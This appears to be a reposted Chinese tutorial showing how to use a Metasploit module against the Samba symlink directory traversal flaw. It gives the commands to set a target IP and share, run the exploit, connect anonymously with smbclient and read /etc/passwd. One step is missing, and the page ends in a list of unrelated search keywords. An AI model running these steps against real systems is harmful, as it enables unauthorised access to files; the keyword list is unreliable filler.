Metasploit溢出samba提权漏洞
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过
千家信息网最后更新 2025年12月01日Metasploit溢出samba提权漏洞
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。
一、利用nmap工具扫描目标主机
1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择"在终端中打开"。

1.3在终端中输入命令"msfconsole",启动MSF终端。
1.4在终端中输入命令"search samba",搜索samba的相关工具和***载荷。
1.5在终端中输入命令"use auxiliary/admin/smb/samba_symlink_traversal",启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6在终端中输入命令"info",查看需要设置的相关项,"yes"表示必须填写的参数。

1.7在终端中输入命令"set RHOST 192.168.1.3",设置目标主机的IP地址。
1.8在终端中输入"set SMBSHARE tmp", 设置SAM可写文件。
1.9在终端中输入"exploit", 开始***。
1.10新打开一个终端,输入"smbclient //192.168.1.3/tmp",直接回车,不用输入密码。
1.11在终端中输入"cd rootfs", 进入rootfs目录,在终端下输入命令"ls",列出目录。
1.12在终端中输入"more /etc/passwd", 查看目标主机系统中的密码。
终端
输入
命令
目录
主机
文件
目标
漏洞
密码
工具
提示
对称
不用
参数
可以通过
地址
提示符
桌面
模块
用户
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
小度服务器怎么找
csgo手游单机服务器怎么安装
网络安全与执法专业男女比例
虚拟文件服务器是什么
网络安全巡查头像
个人远程服务器安全
甘肃长信互联网络科技有限公司
数据库如何建立一个查询
互联网和数据库有啥区别
黑龙江医院数据库
网络安全等级保护gb
计算机网络安全三要素
服务器中转站
数据库列表
网络安全工程师要求证
莫纳什大学网络安全硕士
mysql数据库被远程连接
在 臻于网络安全新境界
数据库中怎么改文件名
服务器架设pdf
网络安全设备配置实训报告
网络安全专题教育特色
数据库发布订阅可以实时么
软件开发过程每个阶段占比
onblur查数据库
tp5远程数据库
哪种数据库安全
服务器企业排名
济南仁威网络技术有限公司
数据可视化和软件开发的区别